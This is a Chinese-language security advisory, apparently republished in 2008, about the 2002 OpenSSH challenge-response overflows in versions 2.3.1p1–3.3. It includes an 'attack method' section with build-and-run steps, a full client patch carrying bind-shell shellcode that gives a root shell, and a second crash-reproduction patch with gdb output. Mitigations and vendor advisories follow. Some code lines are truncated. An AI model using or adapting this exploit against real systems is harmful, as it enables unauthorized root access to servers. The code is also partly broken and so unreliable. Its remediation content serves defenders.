OpenSSH缺陷允许攻击者远程利用/非法执行任意代码

王朝other·作者佚名 2008-05-19

宽屏版字体: 小|中|大|超大

涉及程序：

OpenSSH versions 2.3.1p1 ~ 3.3

描述：

OpenSSH缺陷允许攻击者远程利用/非法执行任意代码(更新)

详细：

在OpenSSH 2.3.1p1到3.3版本中，关于挑战反应处理代码存在安全性缺陷。允许远程入侵者以sshd(通常是root)进程的身份执行任意指令。

第一个缺陷是因为在挑战反应认证过程中，OpenSSH在处理关于收到的响应次数的变量上存在整型溢出风险，如果挑战反应设置为打开，并且系统使用SKEY或者BSD_AUTH认证选项，则允许攻击者利用此缺陷远程执行任意指令。这个漏洞已经被证实。

第二个缺陷牵涉到使用交互式键盘认证的PAM模块, OpenSSH 2.3.1p1~3.3版本。OpenSSH在处理关于收到的响应次数的变量上存在缓冲溢出风险，不论挑战反应设置如何，系统使用交互式键盘认证的PAM模块(PAMAuthenticationViaKbdInt)，可能会导致允许远程非法执行指令的风险。目前尚未有代码证实是否能达到攻击效果。

对这两个缺陷的攻击，都建立在使用SSH ver2的版本特征上。

多个Linux/Unix平台受该漏洞影响。

多个Linux组织和厂商为此发布安全公告。

攻击方法：

1. 下载 openssh-3.2.2p1.tar.gz 并解压

~ $ tar -xvzf openssh-3.2.2p1.tar.gz

2. 执行提供的补丁: (将下方红色字体段落存为补丁文件)

~/openssh-3.2.2p1 $ patch

3. 编译已经打过补丁的OpenSSH客户端：

~/openssh-3.2.2p1 $ ./configure && make ssh

4. 运行ssh:

~/openssh-3.2.2p1 $ ./ssh root:skey@localhost

5. 如果成功，则可连接128端口

~ $ nc localhost 128

uname -a

OpenBSD nice 3.1 GENERIC#59 i386

uid=0(root) gid=0(wheel) groups=0(wheel)

(除此之外，bugtraq.org提供了一个打过补丁的SSH攻击客户端：sshutup-theo.tar.gz)

--- sshconnect2.c Sun Mar 31 20:49:39 2002

+++ evil-sshconnect2.c Fri Jun 28 19:22:12 2002

@@ -839,6 +839,56 @@

* parse INFO_REQUEST, prompt user and send INFO_RESPONSE

+int do_syscall( int nb_args, int syscall_num, ... );

+void shellcode( void )

+ int server_sock, client_sock, len;

+ struct sockaddr_in server_addr;

+ char rootshell[12], *argv[2], *envp[1];

+ server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );

+ server_addr.sin_addr.s_addr = 0;

+ server_addr.sin_port = 32768;

+ server_addr.sin_family = AF_INET;

+ do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr,

16 );

+ do_syscall( 2, 106, server_sock, 1 );

+ client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)

+ &server_addr, &len );

+ do_syscall( 2, 90, client_sock, 0 );

+ do_syscall( 2, 90, client_sock, 1 );

+ do_syscall( 2, 90, client_sock, 2 );

+ * (int *) ( rootshell + 0 ) = 0x6E69622F;

+ * (int *) ( rootshell + 4 ) = 0x0068732f;

+ * (int *) ( rootshell + 8 ) = 0;

+ argv[0] = rootshell;

+ argv[1] = 0;

+ envp[0] = 0;

+ do_syscall( 3, 59, rootshell, argv, envp );

+int do_syscall( int nb_args, int syscall_num, ... )

+ int ret;

+ asm(

+ "mov 8(%ebp), %eax; "

+ "add $3,%eax; "

+ "shl $2,%eax; "

+ "add %ebp,%eax; "

+ "mov 8(%ebp), %ecx; "

+ "push_args: "

+ "push (%eax); "

+ "sub $4, %eax; "

+ "loop push_args; "

+ "mov 12(%ebp), %eax; "

+ "push $0; "

+ "int $0x80; "

+ "mov %eax,-4(%ebp)"

+ );

+ return( ret );

void

input_userauth_info_req(int type, u_int32_t seq, void *ctxt)

{

@@ -865,7 +915,7 @@

xfree(inst);

xfree(lang);

- num_prompts = packet_get_int();

+ num_prompts = 1073741824 + 1024;

* Begin to build info response packet based on prompts requested.

* We commit to providing the correct number of responses, so if

@@ -874,6 +924,13 @@

packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);

packet_put_int(num_prompts);

+ for( i = 0; i

+ packet_put_cstring( "xxxxxxxxxx" );

+ packet_put_string( shellcode, 2047 );

+ packet_send();

+ return;

debug2("input_userauth_info_req: num_prompts %d", num_prompts);

for (i = 0; i

解决方案：

将OpenSSH升级到3.4版本。

http://www.openssh.com/txt/preauth.adv

禁止 SSH 协议 ver 2

在 /etc/ssh/sshd_config: 增加下面这行：

Protocol 1

禁止挑战反应认证

对于OpenSSH 2.9以上版本，管理员可以禁止挑战反应认证选项：

在 /etc/ssh/sshd_config 增加一行:

ChallengeResponseAuthentication no

默认情况下是设置为 yes

禁止PAM模块：

/etc/ssh/sshd_config:

PAMAuthenticationViaKbdInt no

老版本下禁止两个选项(2.3.1p1 and 2.9)

KbdInteractiveAuthentication no

ChallengeResponseAuthentication no

使用权限限制最小化影响：

/etc/ssh/sshd_config:

UsePrivilegeSeparation yes

多个Unix平台受此漏洞影响，已经有多个Unix vendor发布安全公告：

Debian Security Advisory DSA-134-4

NetBSD Security Advisory SA2002-005

OpenPKG Security Advisory

SuSE Security Announcement

Trustix Secure Linux

附加信息：

How to reproduce OpenSSH Overflow.

The R7 team did a little investigating into one of the OpenSSH

vulnerabilities.

The following are instructions on how to reproduce a segmentation

violation in sshd (v3.2.3p1):

0.) Compile with PAM and S/KEY support.

1.) Apply the following patch to the ssh client:

- --- sshconnect2.c.bak Thu Jun 27 11:54:54 2002

+++ sshconnect2.c Thu Jun 27 11:56:27 2002

@@ -866,6 +866,7 @@

xfree(lang);

num_prompts = packet_get_int();

+ num_prompts = 2;

* Begin to build info response packet based on prompts requested.

* We commit to providing the correct number of responses, so if

@@ -877,15 +878,16 @@

debug2("input_userauth_info_req: num_prompts %d", num_prompts);

for (i = 0; i

+ if ( i == 0 ) {

prompt = packet_get_string(NULL);

echo = packet_get_char();

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

- -

+ }

packet_put_cstring(response);

- - memset(response, 0, strlen(response));

+ /*memset(response, 0, strlen(response));

xfree(response);

- - xfree(prompt);

+ xfree(prompt);*/

}

packet_check_eom(); /* done with parsing incoming message. */

2.) Add "PAMAuthenticationViaKbdInt yes" to 'sshd_config'.

3.) Connect to sshd using the modified client.

Note: valid credentials are not required.

On the server side, you'll see:

[root@wonderland hi_chad]# gdb /usr/sbin/sshd

GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain

conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux"...

(no debugging symbols found)...

(gdb) run -d

Starting program: /usr/sbin/sshd -d

debug1: sshd version OpenSSH_3.2.3p1

debug1: private host key: #0 type 0 RSA1

debug1: read PEM private key done: type RSA